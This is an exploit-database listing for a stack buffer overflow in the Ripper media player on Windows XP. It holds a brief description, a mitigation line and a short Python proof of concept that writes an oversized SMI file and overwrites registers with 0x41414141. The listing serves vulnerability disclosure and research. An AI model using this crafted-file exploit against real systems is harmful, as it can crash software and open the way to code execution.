header-logo
Suggest Exploit
vendor:
Ripper
by:
N/A
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Ripper
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
N/A

Buffer Overflow in Ripper

A buffer overflow vulnerability exists in Ripper, which is a media player. An attacker can exploit this vulnerability by sending a specially crafted SMI file with a large amount of data, which can cause a stack-based buffer overflow. This can allow the attacker to control the registers and execute arbitrary code.

Mitigation:

The vendor should implement proper input validation and boundary checks to prevent buffer overflows.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Tested on: win XPsp3
# webpage: d3b4g.info

#EAX 00E1C880
#EDX 00000001
#EBX 41414141------------------------------------------------
#ESP 000D198C
#EBP 00E1C880          controle over registers
#ESI 41414141------------------------------------------------
#EDI 00E1C880
#EIP 00431302 Ripper.00431302
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 0  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)

chars = "A"*90000
crush = "\x41\x41\x41\x41" 
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()

Navigation

Suggest Exploit

Services By CQR